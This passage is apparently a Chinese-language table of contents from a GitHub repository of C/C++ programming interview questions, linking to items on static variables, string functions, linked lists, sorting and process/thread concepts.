全局变量和局部变量有什么区别?实怎么实现的?操作系统和编译器是怎么知道的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#816%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E5%92%8C%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB%E5%AE%9E%E6%80%8E%E4%B9%88%E5%AE%9E%E7%8E%B0%E7%9A%84%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%92%8C%E7%BC%96%E8%AF%91%E5%99%A8%E6%98%AF%E6%80%8E%E4%B9%88%E7%9F%A5%E9%81%93%E7%9A%84) ##### [19.2.4 有 A 、 B 、 C 、 D 四个人,要在夜里过一座桥。他们通过这座桥分别需要耗时 1 、 2 、 5 、 10 分钟,只有一支手电,并且同时最多只能两个人一起过桥。请问,如何安排,能够在 17 
分钟内这四个人都过桥?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#817%E6%9C%89-a--b--c--d-%E5%9B%9B%E4%B8%AA%E4%BA%BA%E8%A6%81%E5%9C%A8%E5%A4%9C%E9%87%8C%E8%BF%87%E4%B8%80%E5%BA%A7%E6%A1%A5%E4%BB%96%E4%BB%AC%E9%80%9A%E8%BF%87%E8%BF%99%E5%BA%A7%E6%A1%A5%E5%88%86%E5%88%AB%E9%9C%80%E8%A6%81%E8%80%97%E6%97%B6-1--2--5--10-%E5%88%86%E9%92%9F%E5%8F%AA%E6%9C%89%E4%B8%80%E6%94%AF%E6%89%8B%E7%94%B5%E5%B9%B6%E4%B8%94%E5%90%8C%E6%97%B6%E6%9C%80%E5%A4%9A%E5%8F%AA%E8%83%BD%E4%B8%A4%E4%B8%AA%E4%BA%BA%E4%B8%80%E8%B5%B7%E8%BF%87%E6%A1%A5%E8%AF%B7%E9%97%AE%E5%A6%82%E4%BD%95%E5%AE%89%E6%8E%92%E8%83%BD%E5%A4%9F%E5%9C%A8-17-%E5%88%86%E9%92%9F%E5%86%85%E8%BF%99%E5%9B%9B%E4%B8%AA%E4%BA%BA%E9%83%BD%E8%BF%87%E6%A1%A5) ##### [19.2.5 static全局变量与普通的全局变量有什么区别?static局部变量和普通局部变量有什么区别?static函数与普通函数有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#818static%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E4%B8%8E%E6%99%AE%E9%80%9A%E7%9A%84%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%ABstatic%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%E5%92%8C%E6%99%AE%E9%80%9A%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%ABstatic%E5%87%BD%E6%95%B0%E4%B8%8E%E6%99%AE%E9%80%9A%E5%87%BD%E6%95%B0%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [19.2.6 对于一个频繁使用的短小函数,在C语言中应用什么实现,在C++中应用什么实现?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#820%E5%AF%B9%E4%BA%8E%E4%B8%80%E4%B8%AA%E9%A2%91%E7%B9%81%E4%BD%BF%E7%94%A8%E7%9A%84%E7%9F%AD%E5%B0%8F%E5%87%BD%E6%95%B0%E5%9C%A8c%E8%AF%AD%E8%A8%80%E4%B8%AD%E5%BA%94%E7%94%A8%E4%BB%80%E4%B9%88%E5%AE%9E%E7%8E%B0%E5%9C%A8c%E4%B8%AD%E5%BA%94%E7%94%A8%E4%BB%80%E4%B9%88%E5%AE%9E%E7%8E%B0) ##### [19.2.7 有1,2,....一直到n的无序数组,求排序算法,并且要求时间复杂度为O(n),空间复杂度O(1),使用交换,而且一次只能交换两个数。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#821%E6%9C%8912%E4%B8%80%E7%9B%B4%E5%88%B0n%E7%9A%84%E6%97%A0%E5%BA%8F%E6%95%B0%E7%BB%84%E6%B1%82%E6%8E%92%E5%BA%8F%E7%AE%97%E6%B3%95%E5%B9%B6%E4%B8%94%E8%A6%81%E6%B1%82%E6%97%B6%E9%97%B4%E5%A4%8D%E6%9D%82%E5%BA%A6%E4%B8%BAon%E7%A9%BA%E9%97%B4%E5%A4%8D%E6%9D%82%E5%BA%A6o1%E4%BD%BF%E7%94%A8%E4%BA%A4%E6%8D%A2%E8%80%8C%E4%B8%94%E4%B8%80%E6%AC%A1%E5%8F%AA%E8%83%BD%E4%BA%A4%E6%8D%A2%E4%B8%A4%E4%B8%AA%E6%95%B0) ##### [19.2.8 sizeof相关系列问题, const相关系列问题](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#822sizeof%E7%9B%B8%E5%85%B3%E7%B3%BB%E5%88%97%E9%97%AE%E9%A2%98-const%E7%9B%B8%E5%85%B3%E7%B3%BB%E5%88%97%E9%97%AE%E9%A2%98) ##### [19.2.9 写出二分查找的代码](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#823%E5%86%99%E5%87%BA%E4%BA%8C%E5%88%86%E6%9F%A5%E6%89%BE%E7%9A%84%E4%BB%A3%E7%A0%81) ##### [19.3.1 写出在母串中查找子串出现次数的代码.](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#824%E5%86%99%E5%87%BA%E5%9C%A8%E6%AF%8D%E4%B8%B2%E4%B8%AD%E6%9F%A5%E6%89%BE%E5%AD%90%E4%B8%B2%E5%87%BA%E7%8E%B0%E6%AC%A1%E6%95%B0%E7%9A%84%E4%BB%A3%E7%A0%81) ##### [19.3.2 查找第一个匹配子串位置,如果返回的是s1长度len1表示没有找到](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#825%E6%9F%A5%E6%89%BE%E7%AC%AC%E4%B8%80%E4%B8%AA%E5%8C%B9%E9%85%8D%E5%AD%90%E4%B8%B2%E4%BD%8D%E7%BD%AE%E5%A6%82%E6%9E%9C%E8%BF%94%E5%9B%9E%E7%9A%84%E6%98%AFs1%E9%95%BF%E5%BA%A6len1%E8%A1%A8%E7%A4%BA%E6%B2%A1%E6%9C%89%E6%89%BE%E5%88%B0) ##### [19.3.3 实现strcpy函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#826%E5%AE%9E%E7%8E%B0strcpy%E5%87%BD%E6%95%B0) ##### 
[19.3.4 实现strcmp函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#827%E5%AE%9E%E7%8E%B0strcmp%E5%87%BD%E6%95%B0) ##### [19.3.5 实现字符串翻转](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#828%E5%AE%9E%E7%8E%B0%E5%AD%97%E7%AC%A6%E4%B8%B2%E7%BF%BB%E8%BD%AC) ##### [19.3.6 用指针的方法,将字符串“ABCD1234efgh”前后对调显示](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#829%E7%94%A8%E6%8C%87%E9%92%88%E7%9A%84%E6%96%B9%E6%B3%95%E5%B0%86%E5%AD%97%E7%AC%A6%E4%B8%B2abcd1234efgh%E5%89%8D%E5%90%8E%E5%AF%B9%E8%B0%83%E6%98%BE%E7%A4%BA) ##### [19.3.7 给定字符串A和B,输出A和B中的最大公共子串。比如A="aocdfe" B="pmcdfa" 则输出"cdf"](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#830%E7%BB%99%E5%AE%9A%E5%AD%97%E7%AC%A6%E4%B8%B2a%E5%92%8Cb%E8%BE%93%E5%87%BAa%E5%92%8Cb%E4%B8%AD%E7%9A%84%E6%9C%80%E5%A4%A7%E5%85%AC%E5%85%B1%E5%AD%90%E4%B8%B2%E6%AF%94%E5%A6%82aaocdfe-bpmcdfa-%E5%88%99%E8%BE%93%E5%87%BAcdf) ##### [19.3.8 判断一个字符串是不是回文](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#831%E5%88%A4%E6%96%AD%E4%B8%80%E4%B8%AA%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%98%AF%E4%B8%8D%E6%98%AF%E5%9B%9E%E6%96%87) ##### [19.3.9 写函数完成内存的拷贝](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#832%E5%86%99%E5%87%BD%E6%95%B0%E5%AE%8C%E6%88%90%E5%86%85%E5%AD%98%E7%9A%84%E6%8B%B7%E8%B4%9D) ##### [19.4.1 写一个函数,它的原形是int continumax(char *outputstr,char *intputstr)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#833%E5%86%99%E4%B8%80%E4%B8%AA%E5%87%BD%E6%95%B0%E5%AE%83%E7%9A%84%E5%8E%9F%E5%BD%A2%E6%98%AFint-continumaxchar-outputstrchar-intputstr) ##### [19.4.2 编写一个 C 函数,该函数在一个字符串中找到可能的最长的子字符串,且该字符串是由同一字符组成的](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#834%E7%BC%96%E5%86%99%E4%B8%80%E4%B8%AA-c-%E5%87%BD%E6%95%B0%E8%AF%A5%E5%87%BD%E6%95%B0%E5%9C%A8%E4%B8%80%E4%B8%AA%E5%AD%97%E7%AC%A6%E4%B8%B2%E4%B8%AD%E6%89%BE%E5%88%B0%E5%8F%AF%E8%83%BD%E7%9A%84%E6%9C%80%E9%95%BF%E7%9A%84%E5%AD%90%E5%AD%97%E7%AC%A6%E4%B8%B2%E4%B8%94%E8%AF%A5%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%98%AF%E7%94%B1%E5%90%8C%E4%B8%80%E5%AD%97%E7%AC%A6%E7%BB%84%E6%88%90%E7%9A%84) ##### [19.4.3 写出快速排序或者某种排序算法代码](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#835%E5%86%99%E5%87%BA%E5%BF%AB%E9%80%9F%E6%8E%92%E5%BA%8F%E6%88%96%E8%80%85%E6%9F%90%E7%A7%8D%E6%8E%92%E5%BA%8F%E7%AE%97%E6%B3%95%E4%BB%A3%E7%A0%81) ##### [19.4.4 将一个单链表逆序](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#836%E5%B0%86%E4%B8%80%E4%B8%AA%E5%8D%95%E9%93%BE%E8%A1%A8%E9%80%86%E5%BA%8F) ##### [19.4.5 循环链表的节点对换和删除](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#837%E5%BE%AA%E7%8E%AF%E9%93%BE%E8%A1%A8%E7%9A%84%E8%8A%82%E7%82%B9%E5%AF%B9%E6%8D%A2%E5%92%8C%E5%88%A0%E9%99%A4) ##### [19.4.6 有双向循环链表结点定义为](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#838%E6%9C%89%E5%8F%8C%E5%90%91%E5%BE%AA%E7%8E%AF%E9%93%BE%E8%A1%A8%E7%BB%93%E7%82%B9%E5%AE%9A%E4%B9%89%E4%B8%BA) ##### [19.4.7 写出程序删除链表中的所有接点](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#839%E5%86%99%E5%87%BA%E7%A8%8B%E5%BA%8F%E5%88%A0%E9%99%A4%E9%93%BE%E8%A1%A8%E4%B8%AD%E7%9A%84%E6%89%80%E6%9C%89%E6%8E%A5%E7%82%B9) ##### [19.4.8 
线形表a、b为两个有序升序的线形表,编写一程序,使两个有序线形表合并成一个有序升序线形表h](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#840%E7%BA%BF%E5%BD%A2%E8%A1%A8ab%E4%B8%BA%E4%B8%A4%E4%B8%AA%E6%9C%89%E5%BA%8F%E5%8D%87%E5%BA%8F%E7%9A%84%E7%BA%BF%E5%BD%A2%E8%A1%A8%E7%BC%96%E5%86%99%E4%B8%80%E7%A8%8B%E5%BA%8F%E4%BD%BF%E4%B8%A4%E4%B8%AA%E6%9C%89%E5%BA%8F%E7%BA%BF%E5%BD%A2%E8%A1%A8%E5%90%88%E5%B9%B6%E6%88%90%E4%B8%80%E4%B8%AA%E6%9C%89%E5%BA%8F%E5%8D%87%E5%BA%8F%E7%BA%BF%E5%BD%A2%E8%A1%A8h) ##### [19.4.9 怎么判断链表中是否有环?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#841%E6%80%8E%E4%B9%88%E5%88%A4%E6%96%AD%E9%93%BE%E8%A1%A8%E4%B8%AD%E6%98%AF%E5%90%A6%E6%9C%89%E7%8E%AF) ##### [19.5.1 static有什么用途?(请至少说明两种)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#842static%E6%9C%89%E4%BB%80%E4%B9%88%E7%94%A8%E9%80%94%E8%AF%B7%E8%87%B3%E5%B0%91%E8%AF%B4%E6%98%8E%E4%B8%A4%E7%A7%8D) ##### [19.5.2 引用与指针有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#843%E5%BC%95%E7%94%A8%E4%B8%8E%E6%8C%87%E9%92%88%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [19.5.3 全局变量和局部变量在内存中是否有区别?如果有,是什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#844%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E5%92%8C%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%E5%9C%A8%E5%86%85%E5%AD%98%E4%B8%AD%E6%98%AF%E5%90%A6%E6%9C%89%E5%8C%BA%E5%88%AB%E5%A6%82%E6%9E%9C%E6%9C%89%E6%98%AF%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [19.5.4 static变量和static 函数各有什么特点?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#845static%E5%8F%98%E9%87%8F%E5%92%8Cstatic-%E5%87%BD%E6%95%B0%E5%90%84%E6%9C%89%E4%BB%80%E4%B9%88%E7%89%B9%E7%82%B9) ##### [19.5.5 static全局变量与普通的全局变量有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#846static%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E4%B8%8E%E6%99%AE%E9%80%9A%E7%9A%84%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [19.5.6 static函数与普通函数有什么区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#847static%E5%87%BD%E6%95%B0%E4%B8%8E%E6%99%AE%E9%80%9A%E5%87%BD%E6%95%B0%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [19.5.7 什么是平衡二叉树?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#848%E4%BB%80%E4%B9%88%E6%98%AF%E5%B9%B3%E8%A1%A1%E4%BA%8C%E5%8F%89%E6%A0%91) ##### [19.5.8 什么函数不能声明为虚函数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#849%E4%BB%80%E4%B9%88%E5%87%BD%E6%95%B0%E4%B8%8D%E8%83%BD%E5%A3%B0%E6%98%8E%E4%B8%BA%E8%99%9A%E5%87%BD%E6%95%B0) ##### [19.5.9 写出float x 与“零值”比较的if语句](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#851%E5%86%99%E5%87%BAfloat-x-%E4%B8%8E%E9%9B%B6%E5%80%BC%E6%AF%94%E8%BE%83%E7%9A%84if%E8%AF%AD%E5%8F%A5) ##### [19.6.1 进程间通信的方式有?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#852%E8%BF%9B%E7%A8%8B%E9%97%B4%E9%80%9A%E4%BF%A1%E7%9A%84%E6%96%B9%E5%BC%8F%E6%9C%89) ##### [19.6.2 const 符号常量](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#853const-%E7%AC%A6%E5%8F%B7%E5%B8%B8%E9%87%8F) ##### [19.6.3 c和c++中的struct有什么不同?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#854c%E5%92%8Cc%E4%B8%AD%E7%9A%84struct%E6%9C%89%E4%BB%80%E4%B9%88%E4%B8%8D%E5%90%8C) ##### [19.6.4 
纯虚函数如何定义?使用时应注意什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#855%E7%BA%AF%E8%99%9A%E5%87%BD%E6%95%B0%E5%A6%82%E4%BD%95%E5%AE%9A%E4%B9%89%E4%BD%BF%E7%94%A8%E6%97%B6%E5%BA%94%E6%B3%A8%E6%84%8F%E4%BB%80%E4%B9%88) ##### [19.6.5 数组和链表的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#856%E6%95%B0%E7%BB%84%E5%92%8C%E9%93%BE%E8%A1%A8%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [19.6.6 线程与进程的区别和联系? 线程是否具有相同的堆栈? dll是否有独立的堆栈?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#857%E7%BA%BF%E7%A8%8B%E4%B8%8E%E8%BF%9B%E7%A8%8B%E7%9A%84%E5%8C%BA%E5%88%AB%E5%92%8C%E8%81%94%E7%B3%BB-%E7%BA%BF%E7%A8%8B%E6%98%AF%E5%90%A6%E5%85%B7%E6%9C%89%E7%9B%B8%E5%90%8C%E7%9A%84%E5%A0%86%E6%A0%88-dll%E6%98%AF%E5%90%A6%E6%9C%89%E7%8B%AC%E7%AB%8B%E7%9A%84%E5%A0%86%E6%A0%88) ##### [19.6.7 一语句实现x是否为2的若干次幂的判断](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#858%E4%B8%80%E8%AF%AD%E5%8F%A5%E5%AE%9E%E7%8E%B0x%E6%98%AF%E5%90%A6%E4%B8%BA2%E7%9A%84%E8%8B%A5%E5%B9%B2%E6%AC%A1%E5%B9%82%E7%9A%84%E5%88%A4%E6%96%AD) ##### [19.6.8 计算结果题目](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#859%E8%AE%A1%E7%AE%97%E7%BB%93%E6%9E%9C%E9%A2%98%E7%9B%AE) ##### [19.6.9 输出下面程序结果](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#860%E8%BE%93%E5%87%BA%E4%B8%8B%E9%9D%A2%E7%A8%8B%E5%BA%8F%E7%BB%93%E6%9E%9C) ##### [19.7.1 写出程序运行结果](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#861%E5%86%99%E5%87%BA%E7%A8%8B%E5%BA%8F%E8%BF%90%E8%A1%8C%E7%BB%93%E6%9E%9C) ##### [19.7.2 求函数返回值,输入x=9999](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#862%E6%B1%82%E5%87%BD%E6%95%B0%E8%BF%94%E5%9B%9E%E5%80%BC%E8%BE%93%E5%85%A5x9999) ##### [19.7.3 用户输入M,N值,从1至N开始顺序循环数数,每数到M输出该数值,直至全部输出。写出C程序](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#863%E7%94%A8%E6%88%B7%E8%BE%93%E5%85%A5mn%E5%80%BC%E4%BB%8E1%E8%87%B3n%E5%BC%80%E5%A7%8B%E9%A1%BA%E5%BA%8F%E5%BE%AA%E7%8E%AF%E6%95%B0%E6%95%B0%E6%AF%8F%E6%95%B0%E5%88%B0m%E8%BE%93%E5%87%BA%E8%AF%A5%E6%95%B0%E5%80%BC%E7%9B%B4%E8%87%B3%E5%85%A8%E9%83%A8%E8%BE%93%E5%87%BA%E5%86%99%E5%87%BAc%E7%A8%8B%E5%BA%8F) ##### [19.7.4 有10亿个浮点数,求出其中最大的10000个 ,用了标准库的,不让用的话,只能自己写堆函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#864%E6%9C%8910%E4%BA%BF%E4%B8%AA%E6%B5%AE%E7%82%B9%E6%95%B0%E6%B1%82%E5%87%BA%E5%85%B6%E4%B8%AD%E6%9C%80%E5%A4%A7%E7%9A%8410000%E4%B8%AA-%E7%94%A8%E4%BA%86%E6%A0%87%E5%87%86%E5%BA%93%E7%9A%84%E4%B8%8D%E8%AE%A9%E7%94%A8%E7%9A%84%E8%AF%9D%E5%8F%AA%E8%83%BD%E8%87%AA%E5%B7%B1%E5%86%99%E5%A0%86%E5%87%BD%E6%95%B0) ##### [19.7.5 在不用第三方参数的情况下,交换两个参数的值 感觉比较:( , bt 而且还是基础题](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#865%E5%9C%A8%E4%B8%8D%E7%94%A8%E7%AC%AC%E4%B8%89%E6%96%B9%E5%8F%82%E6%95%B0%E7%9A%84%E6%83%85%E5%86%B5%E4%B8%8B%E4%BA%A4%E6%8D%A2%E4%B8%A4%E4%B8%AA%E5%8F%82%E6%95%B0%E7%9A%84%E5%80%BC-%E6%84%9F%E8%A7%89%E6%AF%94%E8%BE%83--bt-%E8%80%8C%E4%B8%94%E8%BF%98%E6%98%AF%E5%9F%BA%E7%A1%80%E9%A2%98) ##### [19.7.6 写一段程序,找出数组中第k大小的数,输出数所在的位置](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#866%E5%86%99%E4%B8%80%E6%AE%B5%E7%A8%8B%E5%BA%8F%E6%89%BE%E5%87%BA%E6%95%B0%E7%BB%84%E4%B8%AD%E7%AC%ACk%E5%A4%A7%E5%B0%8F%E7%9A%84%E6%95%B0%E8%BE%93%E5%87%BA%E6%95%B0%E6%89%80%E5%9C%A8%E7%9A%84%E4%BD%8D%E7%BD%AE) ##### [19.7.7 
求1000!的未尾有几个0(用素数相乘的方法来做,如72=22233)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#867%E6%B1%821000%E7%9A%84%E6%9C%AA%E5%B0%BE%E6%9C%89%E5%87%A0%E4%B8%AA0%E7%94%A8%E7%B4%A0%E6%95%B0%E7%9B%B8%E4%B9%98%E7%9A%84%E6%96%B9%E6%B3%95%E6%9D%A5%E5%81%9A%E5%A6%827222233) ##### [19.7.8 编程实现:把十进制数(long型)分别以二进制和十六进制形式输出,不能使用printf系列库函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#868%E7%BC%96%E7%A8%8B%E5%AE%9E%E7%8E%B0%E6%8A%8A%E5%8D%81%E8%BF%9B%E5%88%B6%E6%95%B0long%E5%9E%8B%E5%88%86%E5%88%AB%E4%BB%A5%E4%BA%8C%E8%BF%9B%E5%88%B6%E5%92%8C%E5%8D%81%E5%85%AD%E8%BF%9B%E5%88%B6%E5%BD%A2%E5%BC%8F%E8%BE%93%E5%87%BA%E4%B8%8D%E8%83%BD%E4%BD%BF%E7%94%A8printf%E7%B3%BB%E5%88%97%E5%BA%93%E5%87%BD%E6%95%B0) ##### [19.7.9 输入N, 打印 N*N 矩阵](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#869%E8%BE%93%E5%85%A5n-%E6%89%93%E5%8D%B0-nn-%E7%9F%A9%E9%98%B5) ##### [19.8.1 斐波拉契数列递归实现的方法如下](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#870%E6%96%90%E6%B3%A2%E6%8B%89%E5%A5%91%E6%95%B0%E5%88%97%E9%80%92%E5%BD%92%E5%AE%9E%E7%8E%B0%E7%9A%84%E6%96%B9%E6%B3%95%E5%A6%82%E4%B8%8B) ##### [19.8.2 将一个数字字符串转换为数字."1234" -->1234](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#871%E5%B0%86%E4%B8%80%E4%B8%AA%E6%95%B0%E5%AD%97%E5%AD%97%E7%AC%A6%E4%B8%B2%E8%BD%AC%E6%8D%A2%E4%B8%BA%E6%95%B0%E5%AD%971234---1234) ##### [19.8.3 编程实现:把十进制数(long型)分别以二进制和十六进制形式输出,不能使用printf系列库函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#872%E7%BC%96%E7%A8%8B%E5%AE%9E%E7%8E%B0%E6%8A%8A%E5%8D%81%E8%BF%9B%E5%88%B6%E6%95%B0long%E5%9E%8B%E5%88%86%E5%88%AB%E4%BB%A5%E4%BA%8C%E8%BF%9B%E5%88%B6%E5%92%8C%E5%8D%81%E5%85%AD%E8%BF%9B%E5%88%B6%E5%BD%A2%E5%BC%8F%E8%BE%93%E5%87%BA%E4%B8%8D%E8%83%BD%E4%BD%BF%E7%94%A8printf%E7%B3%BB%E5%88%97%E5%BA%93%E5%87%BD%E6%95%B0) ##### [19.8.4 实现任意长度的整数相加或者相乘功能](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#873%E5%AE%9E%E7%8E%B0%E4%BB%BB%E6%84%8F%E9%95%BF%E5%BA%A6%E7%9A%84%E6%95%B4%E6%95%B0%E7%9B%B8%E5%8A%A0%E6%88%96%E8%80%85%E7%9B%B8%E4%B9%98%E5%8A%9F%E8%83%BD) ##### [19.8.5 用递归算法判断数组a[N]是否为一个递增数组](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#874%E7%94%A8%E9%80%92%E5%BD%92%E7%AE%97%E6%B3%95%E5%88%A4%E6%96%AD%E6%95%B0%E7%BB%84an%E6%98%AF%E5%90%A6%E4%B8%BA%E4%B8%80%E4%B8%AA%E9%80%92%E5%A2%9E%E6%95%B0%E7%BB%84) ##### [19.8.6 给两个数组和他们的大小,还有一动态开辟的内存,求交集,把交集放到动态内存dongtai,并且返回交集个数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#876%E7%BB%99%E4%B8%A4%E4%B8%AA%E6%95%B0%E7%BB%84%E5%92%8C%E4%BB%96%E4%BB%AC%E7%9A%84%E5%A4%A7%E5%B0%8F%E8%BF%98%E6%9C%89%E4%B8%80%E5%8A%A8%E6%80%81%E5%BC%80%E8%BE%9F%E7%9A%84%E5%86%85%E5%AD%98%E6%B1%82%E4%BA%A4%E9%9B%86%E6%8A%8A%E4%BA%A4%E9%9B%86%E6%94%BE%E5%88%B0%E5%8A%A8%E6%80%81%E5%86%85%E5%AD%98dongtai%E5%B9%B6%E4%B8%94%E8%BF%94%E5%9B%9E%E4%BA%A4%E9%9B%86%E4%B8%AA%E6%95%B0) ##### [19.8.7 用两个栈实现一个队列的功能?要求给出算法和思路!](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#879%E7%94%A8%E4%B8%A4%E4%B8%AA%E6%A0%88%E5%AE%9E%E7%8E%B0%E4%B8%80%E4%B8%AA%E9%98%9F%E5%88%97%E7%9A%84%E5%8A%9F%E8%83%BD%E8%A6%81%E6%B1%82%E7%BB%99%E5%87%BA%E7%AE%97%E6%B3%95%E5%92%8C%E6%80%9D%E8%B7%AF) ##### [19.8.8 求组合数: 求n个数(1....n)中k个数的组合.... 
如:combination(5,3)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#880%E6%B1%82%E7%BB%84%E5%90%88%E6%95%B0-%E6%B1%82n%E4%B8%AA%E6%95%B01n%E4%B8%ADk%E4%B8%AA%E6%95%B0%E7%9A%84%E7%BB%84%E5%90%88-%E5%A6%82combination53) ##### [19.8.9 下面是C语言中两种if语句判断方式。请问哪种写法更好?为什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#881%E4%B8%8B%E9%9D%A2%E6%98%AFc%E8%AF%AD%E8%A8%80%E4%B8%AD%E4%B8%A4%E7%A7%8Dif%E8%AF%AD%E5%8F%A5%E5%88%A4%E6%96%AD%E6%96%B9%E5%BC%8F%E8%AF%B7%E9%97%AE%E5%93%AA%E7%A7%8D%E5%86%99%E6%B3%95%E6%9B%B4%E5%A5%BD%E4%B8%BA%E4%BB%80%E4%B9%88) ##### [19.9.1 下面的代码有什么问题?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#882%E4%B8%8B%E9%9D%A2%E7%9A%84%E4%BB%A3%E7%A0%81%E6%9C%89%E4%BB%80%E4%B9%88%E9%97%AE%E9%A2%98) ##### [19.9.2 下面的代码有什么问题?并请给出正确的写法。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#883%E4%B8%8B%E9%9D%A2%E7%9A%84%E4%BB%A3%E7%A0%81%E6%9C%89%E4%BB%80%E4%B9%88%E9%97%AE%E9%A2%98%E5%B9%B6%E8%AF%B7%E7%BB%99%E5%87%BA%E6%AD%A3%E7%A1%AE%E7%9A%84%E5%86%99%E6%B3%95) ##### [19.9.3 下面代码有什么错误?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#884%E4%B8%8B%E9%9D%A2%E4%BB%A3%E7%A0%81%E6%9C%89%E4%BB%80%E4%B9%88%E9%94%99%E8%AF%AF) ##### [19.9.4 下面代码有什么问题?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#885%E4%B8%8B%E9%9D%A2%E4%BB%A3%E7%A0%81%E6%9C%89%E4%BB%80%E4%B9%88%E9%97%AE%E9%A2%98) ##### [19.9.5 下面的代码有什么问题?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#886%E4%B8%8B%E9%9D%A2%E4%BB%A3%E7%A0%81%E6%9C%89%E4%BB%80%E4%B9%88%E9%97%AE%E9%A2%98) ##### [19.9.6 下面的代码有什么问题?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#887%E4%B8%8B%E9%9D%A2%E4%BB%A3%E7%A0%81%E6%9C%89%E4%BB%80%E4%B9%88%E9%97%AE%E9%A2%98) ##### [19.9.7 下面的代码有什么问题?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#888%E4%B8%8B%E9%9D%A2%E4%BB%A3%E7%A0%81%E6%9C%89%E4%BB%80%E4%B9%88%E9%97%AE%E9%A2%98) ##### [19.9.8 